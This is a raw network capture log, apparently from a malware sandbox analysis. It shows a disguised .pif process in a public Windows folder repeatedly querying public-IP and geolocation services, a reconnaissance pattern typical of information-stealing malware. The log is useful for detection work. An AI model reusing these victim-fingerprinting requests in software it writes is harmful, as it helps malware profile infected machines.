Jan 6, 2025 07:58:20.015105963 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:20.705001116 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49765	132.226.247.73	80	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:21.367374897 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:22.041636944 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49767	132.226.247.73	80	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:22.570384979 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:23.252554893 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:58:23.256588936 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 6, 2025 07:58:23.474688053 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:58:24.792794943 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 6, 2025 07:58:25.003606081 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49768	132.226.247.73	80	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:22.686861992 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:23.382644892 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49771	132.226.247.73	80	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:23.995826960 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:24.720273018 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49775	132.226.247.73	80	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:25.356904030 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:26.028424978 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49776	132.226.247.73	80	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:25.643034935 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 6, 2025 07:58:26.333726883 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49779	132.226.247.73	80	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:26.630844116 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:27.311961889 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49780	132.226.247.73	80	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:26.933778048 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:27.623044968 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49784	132.226.247.73	80	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:28.226015091 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:28.910039902 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49786	132.226.247.73	80	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:29.527501106 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:30.211429119 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49788	132.226.247.73	80	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:30.826227903 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:31.530226946 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49790	132.226.247.73	80	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:32.144109011 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:32.958971024 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49792	132.226.247.73	80	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:33.552324057 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:34.253355026 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	188.114.97.3	443	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:04 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-06 06:58:05 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:04 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461474 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qc37PTUo0bjteg0apweXlQJFQ2gnHWPFzyHvztjh9wg0tngvuvpGwgscsFLsFPHd%2BVDfbs8veYUMVj4YP0vvG%2F7ZWn39T22JkBJtZ0x1KRDnKYKUS%2BN9LGkZ6GKVv9yDNFTA2v7P"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d14d1bf1efa7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2058&min_rtt=2058&rtt_var=772&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1416100&cwnd=161&unsent_bytes=0&cid=b24ae895724d263b&ts=546&x=0"
2025-01-06 06:58:05 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	188.114.97.3	443	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:05 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-06 06:58:05 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:05 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461474 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SQ46D8cTiXmcBl2r%2FHH1sy0DBK71HjdlH5ICKxSVhVJ60%2FJ4rTBqf106ubQVsPj4KvT8EwMQSGULhPky2yyTnQPrSB0fLlE0FyK6%2FTRaPl6p74e2HNQFe6KymJkN60lR1FbFc7MI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1527da0427c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1879&min_rtt=1866&rtt_var=727&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1478481&cwnd=246&unsent_bytes=0&cid=2986cafe63060a5f&ts=146&x=0"
2025-01-06 06:58:05 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	188.114.97.3	443	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:07 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-06 06:58:07 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:07 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461476 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FF9HHlUFHKYZMvK6nFYRl62c3Hwou3QFp%2FCkPKQRtoHAFNhC%2B9zSe6xs%2FraglsXtxHPIWfehN730xwZq49F1n796TgThpq%2BilTGNiT3yOHzFgWAT8aghqNeE6GAwIp2MF3M%2BoJgO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d15a8c160f46-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1696&rtt_var=655&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1645070&cwnd=229&unsent_bytes=0&cid=5bd47ec7480c0dcc&ts=137&x=0"
2025-01-06 06:58:07 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49738	188.114.97.3	443	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:08 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
